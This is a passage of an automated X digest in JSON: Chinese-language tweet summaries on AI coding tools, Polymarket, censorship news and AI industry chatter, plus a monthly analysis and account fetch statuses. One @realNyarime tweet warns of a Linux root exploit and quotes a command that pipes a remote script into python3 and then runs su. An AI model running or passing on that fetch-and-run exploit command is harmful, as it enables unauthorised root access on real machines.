@runes_leo: 刚实测,第一反应仍然是「9.11 更大」,靠把 9.9 写成 9.90 这一步才把自己绕回来。😂\n[原文链接](https://x.com/runes_leo/status/2049745621159145603)\n\n**[2026-04-30T07:00:07+00:00]**\n> ChatGPT 能解 PhD 物理题,9.11 比 9.9 这道小学数学题,第一反应还是会答错。 不是它笨,是它根本看不见这串字符。 Karpathy 三小时讲 LLM 的新视频里专门讲了原因——做了个 60 秒解读 👇\n[原文链接](https://x.com/runes_leo/status/2049745599105572981)\n\n**[2026-04-30T06:07:18+00:00]**\n> 看了一圈大 V 解读 Cursor SDK 的爆款推, 都在讲它多牛、什么操作系统、范式转移。 我说说一夜实测的真实数据。 我手搓了 5 天的 AI 自动化, 今天被官方版替了。 5 天前用 Cursor 命令行 + bash 脚本搓的, 让它在后台 7×24 跑各种重复但费脑的活 (拆解、扫描、整理这类)。 烧 $10K 免费额度。 跑得不算丝滑: 经常卡顿,产出格式飘移, 脚本日志显示我跑「…\n[原文链接](https://x.com/runes_leo/status/2049732305829454015)\n\n**[2026-04-30T04:34:09+00:00]**\n> R to @runes_leo: 想体验 Typeless 可以走这个链接🫡 https://www.typeless.com/?via=leo-x\n[原文链接](https://x.com/runes_leo/status/2049708861679153445)\n\n**[2026-04-30T04:34:08+00:00]**\n> 搞 AI 的同行 +1,但有个反差:我 Dock 上没有 Claude 和 Codex 的 App 图标,就一个终端做入口。 用 Ghostty 还得专门感谢刷到 @wangray 的这个推荐,从 iTerm 迁过来体验确实有提升。 我每天就 2 个图标: 1. Ghostty 终端:Claude Code + Codex + ssh + pm2 一切的一切唯一入口 2. Typeless:语音…\n[原文链接](https://x.com/runes_leo/status/2049708857598107988)\n\n**[2026-04-30T02:16:00+00:00]**\n> 搭了一条管线:B站 3.5h 长访谈 → 30 分钟出文章 + http://leolabs.me 网站部署。 刚跑通的是张小珺采访小米罗福莉 3.5h 视频。零外部 API 成本,全本地: → B站 API 绕 412 拿音频 → mlx-whisper(small 模型,31x 实时,本地 7min 转完) → Haiku subagent 分章节摘要 → 主线程 Opus 合稿 + 卡片 …\n[原文链接](https://x.com/runes_leo/status/2049674096041189620)\n\n**[2026-04-29T23:27:00+00:00]**\n> 没建工作流前,每天起床打开 X 刷一会儿就开始焦虑——爆款看不完、KOL 推文跟不上、PM 平台又升级了不知道哪条该 follow。 现在每天 30 分钟跑一次 /today + /morning,把当天外部信息流梳成可执行清单: 合计 31 条 · 预计 6-8h 消化完 每条都明确动作:写推 / 评估装不装 / 扫一眼跳过 / 私享给付费读者 / 进 backlog 推到周日。 跑完那一刻焦…\n[原文链接](https://x.com/runes_leo/status/2049631565710528661)\n\n**[2026-04-29T15:38:00+00:00]**\n> 今天才发现自己 80.8% 的 Claude Code skill 是装废的。 读 Tw93 这篇学到了,description 写\"用于 X / X workflow\"是\"功能介绍型\",AI 主线程根本看不到何时该调它。 52 个 skill 一直纳闷 codeburn 这个月 subagent 调用率为啥才 0.18%,可能的原因找到了。 今天全改成 Use when + NOT when,…\n[原文链接](https://x.com/runes_leo/status/2049513537966674317)\n\n**[2026-04-29T13:16:00+00:00]**\n> Day 5 — Cursor 送的 $10K 刚烧到 $164,刚 1.64%。慢得我自己都着急。 本来以为\"路还长\",今天才发现不是慢的问题,是方向错了。 我现在 3 个 worker 并行在跑:白天我自己开 Claude / Codex 终端推任务,夜里 Codex loop 烧策略 / 数据基座的额度,Cursor 24/7 跑 daemon 一直不停。 之前我把 Cursor 这个 lo…\n[原文链接](https://x.com/runes_leo/status/2049477802978664657)\n\n**[2026-04-29T11:27:00+00:00]**\n> Polymarket V2 cutover 24 小时观察。 把十几个策略账户的 USDC.e 全部迁到 pUSD,verify + smoke PASS。一起来观察下第一天的市场反应。 --- 【数据层】@lnkybtc 秋田老师的链上数据最直观: • V2 部署后 4 小时,pUSD 发行 1.7 亿美元,186 万笔转账,68,686 个持有地址 • 6 小时内,PM TVL 4.5 亿里…\n[原文链接](https://x.com/runes_leo/status/2049450372285046792)\n\n**[2026-04-29T10:38:03+00:00]**\n> Anthropic ships changelogs. OpenAI ships vibes.\n[原文链接](https://x.com/runes_leo/status/2049438052310020226)\n\n**[2026-04-29T09:40:13+00:00]**\n> Claude Code 加了 push 通知,任务跑完手机叫你,让你能从终端走开。 但通知再快也是要人读的。我并不想读。 我有几个 TG 频道接监控,策略告警/异常/系统/信号分开收,每天未读消息几十条。但还是要我自己打开看:是真需要动手处理,还是又一次正常状态监控。这跟没提醒区别不大。 懒人的真需求不是\"通知更快\",是 AI 替我读完那条告警,归类、判断、给一行结论:这条 P0 现在去改 / …\n[原文链接](https://x.com/runes_leo/status/2049423498494566836)\n\n**[2026-04-29T08:16:00+00:00]**\n> 刚学习完罗福莉老师这场 3.5h 访谈发了中文解读, 转头就刷到她团队在送 100T tokens grant,立马提交申请。 表单做得对中文 builder 极友好: 工具栏 OpenClaw / Claude Code / Codex 排前三 模型可勾 Claude / MiMo / DeepSeek / 豆包 / MiniMax 等国产 下一步:把 MiMo V2.5 接进现有 Claud…\n[原文链接](https://x.com/runes_leo/status/2049402305217241384)\n\n**[2026-04-29T06:15:09+00:00]**\n> x.com/i/article/204902031072…\n[原文链接](https://x.com/runes_leo/status/2049371895267774715)\n\n**[2026-04-29T02:16:00+00:00]**\n> 群里讨论开源 bot,多数人共识就一句话:赚钱的 bot 没人会开源。 听着像废话,但这个常识在 AI 时代变得尖锐—— 以前护城河是\"代码会写\"。现在 github 丢给 AI,几秒钟读完整个架构。重写成本从两个月变成两小时。 护城河从\"代码会写\"变成\"策略会想\"。 这件事我自己也在分层做—— polymarket-toolkit 我开源(仓库https://github.com/runesl…\n[原文链接](https://x.com/runes_leo/status/2049311708330459226)\n\n---\n\n### ⚠️ @oranges — 比特币橙子(获取失败)\n\n- 错误: snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @realNyarime — 奶昔(18 条)\n\n**[2026-04-30T18:49:33+00:00]**\n> 还得是投行的女高管,操控股价有水平的\n[原文链接](https://x.com/realNyarime/status/2049924132037693573)\n\n**[2026-04-30T17:00:21+00:00]**\n> 这下不止中国大陆,连香港到美的互联也要玩烂了! FCC表决撤销中资运营商的一揽子授权之提议,目的是堵住 2022 年的法律漏洞:即使「中资运营商」的通信牌照被撤销,它们仍可根据一揽子授权(Blanket Authority)自动获得美国国内的州际电信服务资质 会议中最激进的部分是关于禁止互联(Interconnection)的讨论,即讨论将从物理上禁止Verizon、AT&T等美资运营商与中资运…\n[原文链接](https://x.com/realNyarime/status/2049896651989614721)\n\n**[2026-04-30T16:33:28+00:00]**\n> N26关门了,中港澳台全部不接受\n[原文链接](https://x.com/realNyarime/status/2049889887684616218)\n\n**[2026-04-30T15:31:15+00:00]**\n> 所以GPT的Plus和Team额度差多少\n[原文链接](https://x.com/realNyarime/status/2049874226778452072)\n\n**[2026-04-30T14:23:38+00:00]**\n> R to @realNyarime: 4月29日,据广州市天河区投资服务中心官方公众号“投资天河”发布消息,科技巨头谷歌已于28日正式签订合同,入驻位于天河CBD珠江新城的城市地标广州国际金融中心(西塔),将率先落地跨境数智赋能服务创新项目,预计今年第三季度正式投入运营。谷歌方面将联合各方优势资源,推出多项创新科技服务。 据了解,谷歌将在广州天河整合全球领先的科技资源,为内地跨境电商企业提供近距…\n[原文链接](https://x.com/realNyarime/status/2049857210659070441)\n\n**[2026-04-30T14:22:45+00:00]**\n> 据羊城晚报报道,谷歌落地广州,入驻位于天河 CBD 珠江新城地标广州国际金融中心(西塔) 将率先落地跨境数智赋能服务创新项目,主打跨境电商业务,预计今年 Q3 正式投入运营 谷歌方面将联合各方优势资源,推出多项国内首创科技服务\n[原文链接](https://x.com/realNyarime/status/2049856990957236483)\n\n**[2026-04-30T13:13:12+00:00]**\n> 这下压力给到CAAC了, 不过当年不予公开的原因是,可能危及国家安全、社会稳定😣\n[原文链接](https://x.com/realNyarime/status/2049839485610029262)\n\n**[2026-04-30T12:41:34+00:00]**\n> 88code以前也是L站的富可敌国之一,后面因为N佬(另一位富可敌国)的PrivNode以10元出售66万债务影响,一直都没退款 主体是北京灵伊智能科技有限公司,本质上是AI中转站,去年年底就有多名佬友反应高峰不可用、故障率高等问题,特别是挂了没有通知 借雪踏乌云佬的帖提一嘴,采买第三方API服务应当多留意一下,避开这类有前科的AI中转站以免造成不必要的经济损失\n[原文链接](https://x.com/realNyarime/status/2049831528109326356)\n\n**[2026-04-30T08:18:44+00:00]**\n> 下载NVIDIA App,领取《鸣潮》游戏礼包 包含游戏道具:高级能源核心 x 2、高级能量袋 x 1、贝币 x 20000。 数量有限,兑完即止。(本活动仅适用于中国大陆用户) 本活动将于 2026 年 6 月 10 日结束。\n[原文链接](https://x.com/realNyarime/status/2049765382433755229)\n\n**[2026-04-30T07:35:26+00:00]**\n> 深飘新工作:AI账号订阅工程师 寻找负责批量化开通低价渠道的,维护稳定性和可用性,需要有经验的!!\n[原文链接](https://x.com/realNyarime/status/2049754484071629206)\n\n**[2026-04-30T06:28:55+00:00]**\n> 看到Xint Code研究团队放出的CVE-2026-31431简直是王炸,换句话说通杀所有Linux发行版,致使低权限账户获得root权限: curl https://copy.fail/exp | python3 && su CVE-2026-31431 建议尽快更新系统,事态紧急可以先打个补丁 echo \"install algif_aead /bin/false\" > /etc/modp…\n[原文链接](https://x.com/realNyarime/status/2049737746563158361)\n\n**[2026-04-30T04:27:38+00:00]**\n> 本质上是个套壳的浏览器,通过MitM、内置的DoH和自签名根证书(Scholar Root CA v1 和 Scholar Service V2)信任劫持实现流量引导,并且有实时清理DOM元素的能力 例如:维基百科的首页,新闻动态、你知道吗全部被动态清零,YouTube整个/watch都是被屏蔽的,只允许看指定的博主的视频,至于http://google.com也不是全白名单 专用 DoH 服务…\n[原文链接](https://x.com/realNyarime/status/2049707224940089709)\n\n**[2026-04-30T03:30:29+00:00]**\n> 昨晚因发布GPT的活动内容导致了冻结 以后还是不发这类促销活动了,以免再发生类似的事 在申诉后的12小时,登录过后要求我删除那篇帖子,在删除过后就恢复了 这类内容烦请移步奶昔论坛 感谢多位推友的关心及问候,谢谢你们。\n[原文链接](https://x.com/realNyarime/status/2049692840901652531)\n\n**[2026-04-29T15:17:31+00:00]**\n> 某校计算机与人工智能学院要求大学生签网络文明行为教育知情书 其中杜绝跨境网络违规行为提到,严禁使用非法翻墙工具、拒绝访问境外非法网站、出售或使用“翻墙”软件\n[原文链接](https://x.com/realNyarime/status/2049508383762612287)\n\n**[2026-04-29T13:10:31+00:00]**\n> 赛尔网络(CERNET)也就是教育网,为高校及科研机构提供「合法信道」 据海豚机场测评消息,部分依赖国际资源的科研机构陆续收到通知,将提供专用浏览器、专用 Docker 来确保有限度的国际网络访问权限,访问目标网站现包括:各大国际学术出版社、Python 官网、谷歌全家桶(不含 Gemini)、Github、Hugging face、Docker Hub、XDA Forums 等 20 多个域名…\n[原文链接](https://x.com/realNyarime/status/2049476423602393208)\n\n**[2026-04-29T12:33:04+00:00]**\n> 据xhs多名该校学生反应,华南师范大学(SCNU)已经开始对不安全的网络行为(例如翻墙)封禁校园网Portal认证账号,导致无法通过Web认证接入互联网 各个学院都发了通知只要翻墙就要被拉黑写报告,不过scnu新开了一个学术浏览器,理论上可以访问谷歌学术\n[原文链接](https://x.com/realNyarime/status/2049467000012124233)\n\n**[2026-04-29T08:43:53+00:00]**\n> R to @realNyarime: 虽然原帖并未提及中国联通,但帖主在评论区提到“联通玩不起”,也害怕被运营商“穿小鞋”因此仅披露运营商未经许可入室查设备,因小区监控不全面而无法取证\n[原文链接](https://x.com/realNyarime/status/2049409325098238125)\n\n**[2026-04-29T08:41:13+00:00]**\n> 据xhs用户「A信通网络」爆料,长沙联通查PCDN,摸着窗户上的钥匙进门,前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。 原文如下:我们突然收到公司的电话,说我办的业务出问题了。还以为啥大事。我赶紧跑过来,发现客户家里的门开着,以为是客户自己在家里,结果客户并不在家。 [坏笑R]前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。…\n[原文链接](https://x.com/realNyarime/status/2049408651660755063)\n\n---\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-05-01T01:28:40.335641+00:00\n**分析账号**: 44个 | **活跃账号**: 35个 | **推文总量**: 492条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:338 条\n- **模型能力**:110 条\n- **算力与芯片**:19 条\n- **交易与市场**:19 条\n- **投融资与并购**:6 条\n\n## 三、活跃账号 Top10\n\n- @sama: 20 条\n- @jason: 20 条\n- @pmarca: 20 条\n- @HarryStebbings: 20 条\n- @runes_leo: 20 条\n- @DavidSacks: 20 条\n- @GoSailGlobal: 20 条\n- @dingyi: 20 条\n- @ylecun: 20 条\n- @paulg: 20 条\n\n## 四、代表性推文\n\n- @sama | 2026-05-01T01:17:03+00:00\n - artificial goblin intelligence achieved\n - https://x.com/sama/status/2050021650641695108\n- @GaryMarcus | 2026-05-01T01:13:13+00:00\n - I dunno. The competition is really tight. But Zuck certainly a top contender! Who’s your “favorite”?\n - https://x.com/GaryMarcus/status/2050020685733564459\n- @GaryMarcus | 2026-05-01T01:11:09+00:00\n - Most evil person in AI\n - https://x.com/GaryMarcus/status/2050020164612104604\n- @GaryMarcus | 2026-05-01T01:09:21+00:00\n - Once again IP thieves accusing other IP thieves of IP thievery! The nerve!\n - https://x.com/GaryMarcus/status/2050019713409814672\n- @jason | 2026-05-01T01:04:19+00:00\n - 😂😂😂@ATLHawks\n - https://x.com/jason/status/2050018446616797370\n- @pmarca | 2026-05-01T01:01:26+00:00\n - We’re finally signing. https://www.bizjournals.com/sanjose/news/2017/06/24/vcs-rally-around-decency-pledge-after-silicon.html\n - https://x.com/pmarca/status/2050017717592510568\n- @HarryStebbings | 2026-05-01T00:55:00+00:00\n - Why Dario at Anthropic has such a hard job predicting compute demands? \"The stakes are enormous and the margin for error is tiny. For every dollar of revenue, you may need $4–5 in…\n - https://x.com/HarryStebbings/status/2050016099606118504\n- @berryxia | 2026-05-01T00:52:14+00:00\n - R to @berryxia: 项目地址: https://github.com/OpenGeometry-io/OpenGeometry官网体验: https://opengeometry.io/\n - https://x.com/berryxia/status/2050015406140903487\n- @berryxia | 2026-05-01T00:52:14+00:00\n - 🚀 Geometry 终于成为 AI 在建筑领域的缺失关键层! @Bootsblac 用 OpenGeometry 把 Text → Floorplans → CAD → Render 完整打通,精度控制成为可能! 1. 从文本/平面图直接生成精准 BREP CAD 模型 2. Three.js 实时渲染 + Google AI 驱动,全流程端到端 3.完…\n - https://x.com/berryxia/status/2050015402647027808\n- @jason | 2026-05-01T00:38:13+00:00\n - No comment\n - https://x.com/jason/status/2050011874989649946\n- @jason | 2026-05-01T00:38:00+00:00\n - Whoever is running the hawks social is a savage 😂\n - https://x.com/jason/status/2050011821914865685\n- @runes_leo | 2026-05-01T00:38:00+00:00\n - 38k 星的 skill 仓库。 上周抄了 1 个 grill-me,今天又加了另外 2 个。 一个是 /tdd 思路。 动手前先写一行——跑完应该长啥样。 对得上才往下走。 加进自己的自检流程,只用于策略代码或 API 调用那类—— 跑了对不对要 grep log 才知道的场景。 skill 没装,精华抄过来了。 另一个是他 SKILL.md 的渐进式骨…\n - https://x.com/runes_leo/status/2050011821352829116\n- @GaryMarcus | 2026-05-01T00:27:22+00:00\n - Tokenmaxxing is stupid. Change my mind?\n - https://x.com/GaryMarcus/status/2050009144846119068\n- @jason | 2026-05-01T00:26:51+00:00\n - RT by @Jason: Image\n - https://x.com/jason/status/2050009016105930837\n- @pmarca | 2026-05-01T00:22:01+00:00\n - Apocalypses (apocalypsii?) are fungible.\n - https://x.com/pmarca/status/2050007800882122833\n- @jason | 2026-05-01T00:20:30+00:00\n - THIS IS INSANE 🔥 PURE DOMINATION 🤦 ATL DOES HAVE SOME GREAT RAPPERS 😂😂😂\n - https://x.com/jason/status/2050007416964591880\n- @AravSrinivas | 2026-05-01T00:18:54+00:00\n - RT by @AravSrinivas: $AAPL CFO: “Leading AI developers like Perplexity are choosing Mac as their preferred platform to build enterprise-grade AI assistants that power autonomous a…\n - https://x.com/AravSrinivas/status/2050007015616135365\n- @pmarca | 2026-05-01T00:09:03+00:00\n - Concerning. https://nypost.com/2026/04/30/business/inside-the-ai-doom-machine-and-who-is-benefiting-from-it/\n - https://x.com/pmarca/status/2050004538216886756\n- @berryxia | 2026-05-01T00:08:27+00:00\n - OpenRouter 又上了匿名新模型Owl Alpha! 1M 上下文,强大的工具调用能力! 猜猜他是谁家的哈哈😂\n - https://x.com/berryxia/status/2050004383971282952\n- @berryxia | 2026-05-01T00:00:12+00:00\n - 兄弟们!老马家的Grok Image终于…… Grok Image Agent 网页版Beta 版本已经上线,目前应该是给付费用户灰度推送中! 这是一款全能创意Agent,可在无限开放画布上独立创作。 Grok Agent在同一工作区内,自动完成规划→生成→编辑→迭代的全流程创作。 只需下达指令,即可观看它在无缝衔接的工作区中,自动完成规划、生成、编辑与迭…\n - https://x.com/berryxia/status/2050002308759695561\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202605.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202605.md" + } +} \ No newline at end of file diff --git a/data/x_brief/history/20260501_194456.json b/data/x_brief/history/20260501_194456.json new file mode 100644 index 0000000..20aa285 --- /dev/null +++ b/data/x_brief/history/20260501_194456.json @@ -0,0 +1,5353 @@ +{ + "generated_at": "2026-05-01T19:38:36.469180+00:00", + "report_type": "weekly", + "input": { + "watchlist_path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/简报配置.md", + "watchers": [ + { + "handle": "karpathy", + "name": "Andrej Karpathy" + }, + { + "handle": "sama", + "name": "Sam Altman" + }, + { + "handle": "DarioAmodei", + "name": "Dario Amodei" + }, + { + "handle": "AravSrinivas", + "name": "Aravind Srinivas" + }, + { + "handle": "AndrewYNg", + "name": "Andrew Ng" + }, + { + "handle": "cursor_ai", + "name": "Cursor" + }, + { + "handle": "ylecun", + "name": "Yann LeCun" + }, + { + "handle": "JeffDean", + "name": "Jeff Dean" + }, + { + "handle": "soumithchintala", + "name": "Soumith Chintala" + }, + { + "handle": "gregbrockman", + "name": "Greg Brockman" + }, + { + "handle": "GaryMarcus", + "name": "Gary Marcus" + }, + { + "handle": "elonmusk", + "name": "Elon Musk" + }, + { + "handle": "paulg", + "name": "Paul Graham" + }, + { + "handle": "naval", + "name": "Naval Ravikant" + }, + { + "handle": "pmarca", + "name": "Marc Andreessen" + }, + { + "handle": "david_tiantian", + "name": "David Tian Wang" + }, + { + "handle": "morganhousel", + "name": "Morgan Housel" + }, + { + "handle": "eladgil", + "name": "Elad Gil" + }, + { + "handle": "DavidSacks", + "name": "David Sacks" + }, + { + "handle": "HarryStebbings", + "name": "Harry Stebbings" + }, + { + "handle": "jason", + "name": "Jason Calacanis" + }, + { + "handle": "charliebilello", + "name": "Charlie Bilello" + }, + { + "handle": "WarriorTrading", + "name": "Warrior Trading" + }, + { + "handle": "CryptoCred", + "name": "Credible Crypto" + }, + { + "handle": "AltcoinBuzz", + "name": "AltcoinBuzz" + }, + { + "handle": "svwang1", + "name": "王川(硅谷)" + }, + { + "handle": "bozhou_ai", + "name": "泊舟" + }, + { + "handle": "lxfater", + "name": "铁锤人" + }, + { + "handle": "berryxia", + "name": "Berryxia" + }, + { + "handle": "Pluvio9yte", + "name": "雪踏乌云" + }, + { + "handle": "liuliu", + "name": "刘进" + }, + { + "handle": "CuiMao", + "name": "CuiMao" + }, + { + "handle": "0xAA_Science", + "name": "0xAA" + }, + { + "handle": "dingyi", + "name": "Ding" + }, + { + "handle": "GoSailGlobal", + "name": "Jason Zhu" + }, + { + "handle": "frxiaobei", + "name": "凡人小北" + }, + { + "handle": "gkxspace", + "name": "余温" + }, + { + "handle": "Stv_Lynn", + "name": "Steven Lynn" + }, + { + "handle": "chuxiaeth", + "name": "初夏" + }, + { + "handle": "二级炒家", + "name": "二级炒家" + }, + { + "handle": "wolfyxbt", + "name": "杀破狼" + }, + { + "handle": "runes_leo", + "name": "Leo" + }, + { + "handle": "oranges", + "name": "比特币橙子" + }, + { + "handle": "realNyarime", + "name": "奶昔" + } + ], + "days": 7, + "per_account_limit": 80 + }, + "output": { + "description": "关注博主近一周推文", + "tweet_window_days": 7, + "tweet_count": 478 + }, + "period": { + "days": 7, + "start_utc": "2026-04-24T19:37:19.444626+00:00", + "end_utc": "2026-05-01T19:38:36.469180+00:00", + "month_tag": "202605" + }, + "overview": { + "total_accounts": 44, + "active_accounts": 34, + "total_tweets": 478, + "failed_accounts": 3, + "source_hits": { + "nitter": 40 + }, + "source_errors": { + "snscrape": 3, + "nitter": 3, + "rsshub": 3 + }, + "tweets_kept": 16 + }, + "accounts": [ + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DarioAmodei", + "account": "@DarioAmodei", + "name": "Dario Amodei", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 7, + "error": "", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 2, + "error": "", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 4, + "error": "", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 16, + "error": "", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "david_tiantian", + "account": "@david_tiantian", + "name": "David Tian Wang", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 8, + "error": "", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 17, + "error": "", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "WarriorTrading", + "account": "@WarriorTrading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "AltcoinBuzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 8, + "error": "", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 18, + "error": "", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 16, + "error": "", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 13, + "error": "", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 9, + "error": "", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "", + "source": "nitter" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "category": "", + "score": "", + "skip_reason": "", + "status": 